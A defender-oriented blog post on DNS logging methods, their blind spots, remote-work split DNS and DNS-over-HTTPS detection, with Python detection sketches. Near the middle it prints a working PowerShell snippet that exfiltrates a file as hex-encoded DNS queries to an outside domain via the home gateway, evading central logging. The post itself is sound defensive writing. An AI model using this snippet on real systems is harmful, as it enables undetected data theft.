How (not) to log DNS traffic

Companies tend to create their security detections based on the trending behavior of threat actors. One of the constantly recurring techniques is DNS-based activity, such as exfiltration via DNS (Domain Name System) or C2 (Command and Control) communication via DNS. Still, a lot of companies lack DNS logging, miss DNS-based detection rules, or are not aware of their own blind spots.

In this post I’m not trying to explain how to detect DNS-based techniques. Information on that topic is easy to find all over the internet. Instead, I’m going to point out the issues and limits of specific logging methods that you may face today or in the near future.


Why DNS is used by attackers but not used by defenders

DNS is one of the pillars of today’s internet traffic. It is used by almost every system that is connected to the internet. Thus, it can be seen on every network-connected machine; its presence is neither surprising nor suspicious. Because it is required by a lot of systems, it is allowed at some level in every network. A workstation can either communicate with an external DNS server directly, or it can at least reach an internal, company-managed DNS server, which forwards its request to an external server. Either way, there is no general way to filter this traffic. To find out whether it is malicious or not, you must focus on the target, the content, or the frequency of the DNS traffic. DNS communication is frequently not blocked, and detecting malicious use of it is not easy and needs continuous maintenance. Together, these facts make DNS a useful protocol for an attacker.

Even though it is a critical protocol and often used by threat actors, companies still tend to overlook DNS logging. There are typically two big reasons behind this. Either the DNS service is provided by a third party (or it sits behind some relay systems), or it is simply a financial decision. In the former case, the problem is that even though the logs can be gathered and detections can be created, finding the real source of a query is not trivial. Detecting something suspicious at a company with 10k+ endpoints but being unable to identify the real source is not helpful, so the logs are considered useless and are not collected at all. The latter reason exists because collecting DNS logs can be costly, especially if it is not done properly. With Windows DNS logging, one DNS query can generate 10+ events on a Windows host, which can be far too much and too expensive. On the other hand, we can configure our logging to collect only the necessary events to make it more efficient and cheaper.

Where to gather DNS events from

DNS logs can be collected from multiple places and in multiple ways in a network. Each of them has its benefits and none of them is a perfect solution. When you choose which one to use, it is important to know the characteristics of the methods, have a clear overview of your network and tooling, and decide what exactly you want to detect in the future.

DNS server

Collecting DNS logs from a centralized DNS server is the first idea in most networks. It is centralized, it is normally easy to forward its logs to a SIEM, and most of the time it already exists in the network, so it can be a good idea to utilize its logging.

Benefits:
- Centralized, so it is easy to manage and simple to collect logs from it.
- It can have some reputation-based tool implemented in it to categorize DNS queries based on the domain name or IP (and this can be logged as well). Additionally, you can use DNS sinkholing implemented in the DNS server which is going to redirect suspicious requests to a Sinkhole server.
Drawbacks:
- Not all DNS requests will be seen in the logs. A DNS server can only log the requests it receives. The default DNS server is configured on the machine and, as we know, machines are not reliable. If a machine can change its DNS configuration, or can send a request directly to another system without changing the settings (for example because there are no firewall rules in place), then the managed DNS server will never see these queries. Thus, it won’t be able to log them. In this case, the DNS sinkhole solution won’t work either.
- Related to the previous bullet point, no DNS traffic is generated if the domain-to-IP binding is already stored on the machine. If the DNS cache (or hosts file) contains the domain, no request is sent. This way an attacker can add an entry to the cache (or hosts file) to redirect the user’s traffic without this being noticed or logged by the DNS server.
- The logged data and its format can vary from DNS server to DNS server. Some of them have reputation capabilities while others don’t. Also, some of them store and log the full TXT response while others won’t, due to size constraints. Switching between DNS server products could require you to adapt your detections. The limited capabilities can especially be an issue for small companies that use free, non-commercial software as their DNS server.

From the wire

Moving away from a centralized solution, another way to gather DNS queries is to collect them from the wire. For this, you need some network tap that can listen to the network traffic and can save/forward the necessary data. A lot of companies already have NIDS in place which is frequently able to monitor and log DNS data (it depends on whether you want to detect DNS anomalies by the NIDS or by your SIEM).

Benefits:
- You can collect all the data, including full packets if you want to, the way you want to (so you don’t depend on the capabilities of the DNS server).
- Fewer collection points than in the case of host-based logging (next method). This can make it easier to manage and to find misconfigurations or errors.
- You can collect DNS traffic from the wire which is not sent to the official DNS server. If the traffic goes through the network but the destination is not your DNS server, then that server won’t be able to log the traffic. However, it is still possible to collect it from the wire (this in itself can be a detection rule to find rogue DNS servers).
- With proper tooling, settings, and rules, you have the possibility to detect secure DNS traffic. For example, DNS over HTTPS can be detected if you have TLS inspection, while it is invisible to DNS server-based logging and (in some cases) to host-based logging.
Drawbacks:
- There are (usually) more systems to maintain than in case of DNS server-based logging.
- Storing full packets can be too complicated and impossible to justify. (This can be solved by an individual log retention policy if your SIEM allows it.)
- The tap or NIDS can have its own weaknesses and vulnerabilities that could be abused by an attacker to prevent logging.
- In some networks, not all the traffic goes through a network tap. In some cases, traffic inside a subnet does not pass a tap, so a rogue DNS server can’t be detected if it is in the same subnet as the workstation. In other cases, there is simply no tap between specific networks. For cost reasons, it can also happen that the traffic between a public site and a machine connected to the network via VPN over the internet is not monitored by a tap, in order to decrease the load on the VPN connections (this traffic does not enter the internal network; it goes directly to the external DNS servers).
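The rogue-resolver rule mentioned in the benefits above can be sketched in a few lines of Python. This is only a minimal illustration, assuming the tap or NIDS exports flow records as dictionaries with `src`, `dst`, and `dst_port` keys; the record format, the function name, and the resolver addresses are all hypothetical.

```python
from ipaddress import ip_address

# Hypothetical allow-list: the resolvers workstations are expected to use.
APPROVED_RESOLVERS = {ip_address("10.0.0.53"), ip_address("10.0.1.53")}


def find_unapproved_dns_flows(flows, approved=APPROVED_RESOLVERS):
    """Return port-53 flows whose destination is not an approved resolver.

    Each flow is a dict with 'src', 'dst' and 'dst_port' keys (an assumed
    format; adapt it to whatever your tap or NIDS actually exports).
    """
    suspicious = []
    for flow in flows:
        if flow["dst_port"] != 53:
            continue  # not classic DNS; DoH/DoT need separate handling
        if ip_address(flow["src"]) in approved:
            continue  # the approved resolvers forward queries themselves
        if ip_address(flow["dst"]) not in approved:
            suspicious.append(flow)
    return suspicious


sample_flows = [
    {"src": "10.1.2.3", "dst": "10.0.0.53", "dst_port": 53},
    {"src": "10.1.2.4", "dst": "8.8.8.8", "dst_port": 53},
    {"src": "10.0.0.53", "dst": "1.1.1.1", "dst_port": 53},
    {"src": "10.1.2.5", "dst": "93.184.216.34", "dst_port": 443},
]
for flow in find_unapproved_dns_flows(sample_flows):
    print(f"{flow['src']} queried unapproved resolver {flow['dst']}")
```

A rule like this only sees traffic that actually crosses a tap, so the blind spots listed in the drawbacks still apply.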

Host-based collection

Collecting DNS logs from the host can itself be done in multiple ways. You can rely on the OS logs (for example, Windows can log DNS queries) or you can use a third-party tool on your system, like an EDR solution. They share some characteristics but also differ in others, so be sure to choose the one that fits you best.

Benefits:
- Every DNS query originates from a host, so you can collect everything. If the machines use a third-party DNS server and the query does not even go through your network, it can still be collected from the host.
- In some cases, you can even detect DNS over HTTPS. When using DoH, the browser resolves the domain by sending the request directly to the configured DoH server, without asking the OS for help. Thus, the OS or an EDR won’t log this traffic. But some browsers (for example Firefox) can be configured to log DoH requests as well, so you can still have some visibility. A new Windows version also allows you to configure the OS to use DoH instead of normal DNS requests, and this traffic can be logged by Windows natively (I haven’t tested this function yet, but you can read about it here).
- Resolutions of domain names that are served from the cache (or the hosts file) can be logged as well.
Drawbacks:
- A machine can be compromised, and machines frequently are. In that state, we can’t trust the logs or the logging on the machine. If you see an odd DNS request, it can still be a good indicator of infection. On the other hand, the lack of suspicious DNS queries doesn’t mean the machine is clean.
- It can be too noisy, so you have to filter out the unnecessary DNS-related events.

So be careful when you choose the logging method you want to use, and be aware of the blind spots in your network. Not seeing something doesn’t mean it is not there.

Typical DNS logging issues

I am pretty sure everybody has seen issues with DNS logging or detection at a company at some point. Therefore, I do not want to list a lot of possible cases. Instead, I want to explain two specific ones that I have witnessed at a lot of companies and that can be an issue today or in the future.

Invisible DNS communication from home

During the recent pandemic, a lot of people started to work from home, either permanently or temporarily. This introduced various new threats for some companies and made other existing threats more severe than they were before. When somebody works remotely, the most popular way to connect the machine securely to the internal network is to use a VPN. In a setup like this, the user’s machine will have one set of IP settings (IP address, default gateway) for its home network and another for the internal network (internal IP assigned by the internal DHCP, internal default gateway, etc.).

It is the job of the VPN client to redirect all of the user’s traffic to the internal network. The VPN configuration defines which traffic should be passed through the VPN tunnel and which can communicate freely. But a machine also should be able to communicate with some systems before it connects to the company’s network so it can build up the connection. This is possibly the reason why the communication with the user’s own default gateway is allowed by the VPN client. (This was the case everywhere I tested it. At least some protocol is allowed.)

So, let me talk a little bit about how DNS resolution works in a setup like this on a Windows host. When your machine connects to your home network, it gets an IP from your DHCP server. It also gets all the other settings needed for further communication, like a default gateway address, a DNS server address, etc. In a simple, typical home network, all these functions are implemented in one access point, and thus all these IPs point to that system.

When the machine has an internet connection, it can build up its VPN tunnel. After this setup, the machine has a second set of settings similar to the one it got from the home AP, but this one is provided by the company-managed internal systems. So (at least) two DNS servers are going to be assigned to the machine.

When a user tries to resolve a domain name to an IP, the machine is going to contact a DNS server. The question is which server is going to be addressed by default: the company one on the other side of the tunnel or the local one in the user’s home network. The important thing here is that the machine is going to create two DNS queries, one for the local server and one for the company server. Both servers are addressed, and both will reply. The machine is going to use the response that arrives first. Obviously, the local one is (most of the time) one hop away from the machine, so it can answer quicker, while the company-owned one can be on the other side of the world, so it takes more time to reply. But please be aware that the default gateway is not necessarily a DNS server itself; frequently it only forwards the traffic, so whether it is the quicker one or not depends on other things as well.

[Figure: home network diagram]

This can be abused by an attacker who has breached the user’s local network or default gateway to redirect the user’s traffic to a chosen IP. Even traffic towards an internal webpage can be redirected this way. While there is only a small chance that an actor will physically be in the user’s network, we know that a lot of routers provided by ISPs are vulnerable or use default passwords, so there is still a non-negligible risk. The big benefit for an attacker here is that they don’t have to infiltrate the company-owned and monitored machine; they only have to access the user’s network/AP.

However, this can still be detected with the proper logging. If the user opens a website using a destination IP that is not the IP provided by the company-owned DNS server, we can assume the user got the IP information from another DNS server, possibly a rogue one. However, this detection is prone to false positives in the case of load-balanced domains that can use multiple IPs.
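As a rough sketch, the comparison described above could look like the following in Python. The input shapes (a mapping of domain to IPs taken from the company DNS logs, and connection tuples from something like proxy logs) and the function name are assumptions made for illustration. Keeping every IP the company resolver has ever returned for a domain, rather than only the latest answer, is one way to reduce the load-balancing false positives.

```python
def find_mismatched_connections(company_answers, connections):
    """Flag connections whose destination IP the company resolver never returned.

    company_answers: dict mapping domain -> set of IPs seen in company DNS logs.
    connections: iterable of (host, domain, dst_ip) tuples, e.g. from proxy logs.
    Both shapes are assumptions for this sketch.
    """
    alerts = []
    for host, domain, dst_ip in connections:
        known_ips = company_answers.get(domain)
        if known_ips is None:
            continue  # no baseline for this domain, nothing to compare against
        if dst_ip not in known_ips:
            alerts.append((host, domain, dst_ip))
    return alerts


# Illustrative data only.
company_answers = {"intranet.corp.example": {"10.20.0.5", "10.20.0.6"}}
connections = [
    ("laptop-01", "intranet.corp.example", "10.20.0.5"),
    ("laptop-02", "intranet.corp.example", "192.168.1.77"),
    ("laptop-03", "unknown.example", "203.0.113.9"),
]
for host, domain, dst_ip in find_mismatched_connections(company_answers, connections):
    print(f"{host} reached {domain} at unexpected IP {dst_ip}")
```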

If you only collect DNS logs from central DNS servers or from the wire, then the previous scenario can be abused by a user or an attacker. As I stated previously, a DNS request in a home network is sent out to both DNS servers by default. However, DNS resolution can be directed from the command line. The following command can be used in Windows PowerShell to send the DNS query only to a specific DNS server.

Resolve-DnsName -Name domainname.com -Server dns_server_ip

As we already established, DNS communication with the default gateway in a home network is not blocked. There are three different DNS servers by location a user can try to query:

Company-owned one: When a user tries to reach an internal DNS system, the traffic is going through the tunnel and reaches the internal (company-owned) DNS server.

External third-party DNS server: In case the target is an external DNS system, the VPN client sends it through the tunnel (depends on the VPN configuration) where a firewall will block this traffic (internal to external DNS communication shouldn’t be allowed from random workstations).

Home DNS server/Default GW: A DNS query targeting the default gateway does not go through the tunnel. It goes directly to the default gateway, thus it won’t be blocked anywhere. So, by setting the -Server switch to the IP address of the default gateway, we can exfiltrate data or communicate with a C2 server via DNS without being detected.

Here is some code to steal an arbitrary file from a company-owned machine via DNS using the default gateway. *(This is not code to be used; I’m just showing how easy it is to exfiltrate some data.)*

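# Read the file in 16-byte chunks (Windows PowerShell 5.1 syntax;
# PowerShell 7 uses -AsByteStream instead of -Encoding Byte)
Get-Content "path_to_the_file" -Encoding Byte -ReadCount 16 |
	ForEach-Object {
		# Hex-encode the chunk so it forms a valid 32-character DNS label
		$output = ""
		foreach ( $byte in $_ ) {
			$output += "{0:X2}" -f $byte
		}
		# Send the chunk as a subdomain query to the home default gateway
		Resolve-DnsName -Name "${output}.forensixchange.com" -Server default_gw_ip
	}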

This latter action can only be detected if DNS events are collected from the host.
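Once the host-based DNS events are available, a query pattern like the one produced by the snippet above is fairly easy to spot. The following Python sketch is only one possible heuristic, assuming the queried names have already been extracted from the host logs as plain strings; the function name and thresholds are hypothetical. It counts distinct long hex-only leftmost labels per parent domain.

```python
import re
from collections import defaultdict

# A leftmost label made only of hex digits, at least 16 characters long.
HEX_LABEL = re.compile(r"^[0-9a-fA-F]{16,}$")


def find_hex_exfil_candidates(queries, min_hits=3):
    """Return {parent_domain: count} for parents that received at least
    min_hits distinct long hex-only leftmost labels."""
    hits = defaultdict(set)
    for name in queries:
        labels = name.rstrip(".").split(".")
        if len(labels) < 3:
            continue  # no subdomain label that could carry data
        first, parent = labels[0], ".".join(labels[1:])
        if HEX_LABEL.match(first):
            hits[parent].add(first.lower())
    return {parent: len(found) for parent, found in hits.items() if len(found) >= min_hits}


# Illustrative query names only.
sample_queries = [
    "4D5A90000300000004000000FFFF0000.example.com",
    "B8000000000000004000000000000000.example.com",
    "00000000000000000000000000000000.example.com",
    "www.example.org",
    "deadbeef.example.net",
]
print(find_hex_exfil_candidates(sample_queries))
```

Some legitimate services also put hashes into subdomains, so a rule like this would need tuning and an allow-list before it is usable in production.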

Detecting DNS over HTTPS

While I already mentioned DoH, I think this protocol is interesting enough to discuss a little bit further and to point out some of its dangers. With DoH, the DNS query is embedded into an HTTPS message. This HTTPS request is then sent to a DoH server, which resolves the domain name to an IP. Before you can send an HTTPS message to the DoH server, you have to resolve the DoH server’s own domain name to an IP as well. This is either done by sending a plain DNS query, or the address can be hardcoded into the app (browser).
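To make the embedding concrete, here is a small Python sketch of how a DoH client could build the GET request defined in RFC 8484: the DNS query is serialized in the normal wire format and then base64url-encoded (without padding) into the `dns` URL parameter. The resolver URL is a placeholder and the helper names are my own; nothing is sent over the network.

```python
import base64
import struct


def build_dns_query(name, qtype=1):
    """Build a minimal DNS query message in wire format (RFC 1035)."""
    # Header: ID=0 (RFC 8484 suggests 0 for cache friendliness),
    # flags=0x0100 (recursion desired), one question, no other records.
    header = struct.pack("!HHHHHH", 0, 0x0100, 1, 0, 0, 0)
    # QNAME: each label prefixed by its length, terminated by a zero byte.
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in name.rstrip(".").split(".")
    ) + b"\x00"
    question = qname + struct.pack("!HH", qtype, 1)  # QTYPE (1 = A), QCLASS 1 = IN
    return header + question


def doh_get_url(resolver_url, name):
    """Return the GET URL a DoH client would request for an A record."""
    wire = build_dns_query(name)
    encoded = base64.urlsafe_b64encode(wire).rstrip(b"=").decode("ascii")
    return f"{resolver_url}?dns={encoded}"


# Placeholder resolver URL; the query part matches the example in RFC 8484.
print(doh_get_url("https://doh.example/dns-query", "www.example.com"))
# prints https://doh.example/dns-query?dns=AAABAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB
```

From the network's point of view this is just another HTTPS request, which is why the content is only visible with TLS inspection.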

Multiple issues need to be addressed by a blue team to successfully handle and detect suspicious DoH traffic:

TLS inspection must be used in the NIDS/network tap/proxy to be able to handle this traffic based on its content. DoH traffic is HTTPS traffic, thus it typically goes through a proxy. Even though proxies can use TLS inspection, I haven’t seen any proxy so far that identified DoH traffic or marked it in the logs. Because of this, it is hard to process DoH traffic in the proxy logs, but I believe that more and more proxies will recognize and mark this traffic in the future.

Every rule you have for DNS-based attack detection has to be modified to work on HTTP traffic as well. It is possible for a NIDS to automatically parse DNS information from a decrypted HTTPS packet (the DoH protocol is well-defined and well-documented) and apply DNS rules to it with a little modification, but the NIDS I’m using does not do this yet. So, you have to prepare your NIDS to detect this traffic and to apply the necessary rules.

If there is no TLS inspection, one can try to detect DoH traffic based on its periodicity and packet sizes; however, this is not reliable. Even if you successfully detect DoH traffic without TLS inspection, it is hard to say whether it is malicious or not, so it will be hard to block only the malicious attempts. This approach can be used to detect endpoints that use DoH, but it is not really the best solution for blocking this type of traffic.

A company can decide to block DoH by blocking the DoH providers. This can be done simply by blocking the IP addresses or URLs of DoH providers, or by blocking the initial DNS request that resolves their domain names. This way one can block all DNS-over-HTTPS traffic towards well-known providers, but there is still a chance that a user picks a lesser-known provider and circumvents the blocklist. And since this traffic looks like normal HTTPS traffic towards an external site, it will be hard to detect or block.
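The provider-based blocking described above boils down to a hostname match, which could be sketched like this in Python. The three hostnames are a tiny illustrative sample of public DoH endpoints, not a complete or maintained list, and the function name is hypothetical.

```python
# Small illustrative sample of public DoH hostnames; a real blocklist would
# be much longer and would need regular updates.
KNOWN_DOH_HOSTS = {"dns.google", "cloudflare-dns.com", "dns.quad9.net"}


def is_known_doh_host(hostname, known_hosts=KNOWN_DOH_HOSTS):
    """Return True if hostname equals a listed DoH host or is a subdomain of one."""
    hostname = hostname.lower().rstrip(".")
    return any(
        hostname == known or hostname.endswith("." + known)
        for known in known_hosts
    )


for candidate in ["dns.google", "mozilla.cloudflare-dns.com", "doh.example"]:
    print(candidate, is_known_doh_host(candidate))
```

The last candidate shows the weakness discussed above: a provider that is not on the list passes the check unnoticed.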

Real life scenarios

During the last half-year, I had less time than usual, so I couldn’t write any blog posts. I have been thinking for a long time about how to create shorter posts, but unfortunately most of my writing just goes deeper and deeper once I start. For this post, I decided not to go too deep or get too technical so that I would be able to finish it in a timely manner. So, while this post is not deeply technical, I’m not going to end it without a good story based on my experiences.

The idea for this post is not a new thing. During the last 2-3 months, I had the chance to test the above-mentioned DNS communication at 5 different companies. At all the companies the users from home could communicate with their default gateway directly by using DNS queries. I assume this is a required setup, so I wasn’t trying to solve this issue, but rather I was trying to find out how many companies have detection for this.

For one company, I do not have the proper information to tell whether they can detect this activity or not. Of the four remaining companies, only one collects DNS events from the machines directly. This means three of them don’t have any visibility from the host to detect exfiltration via the default gateway by a remote user. However, the logging of that last company wasn’t sufficient either. They collected the DNS queries from the host by configuring their EDR, but they only defined a dozen tools they wanted to monitor, and DNS network communication from other applications wasn’t logged at all (for example, some browsers were defined, but PowerShell wasn’t).

Based on this, I recommend you check your logging capabilities and see what you can or can’t detect. It can be especially interesting to find out whether your users (or attackers on the machine) can easily push out data via DNS in their home network without being detected at all. I also suggest you check whether you can detect DoH traffic, because it is going to be the default setting soon, even at the OS level.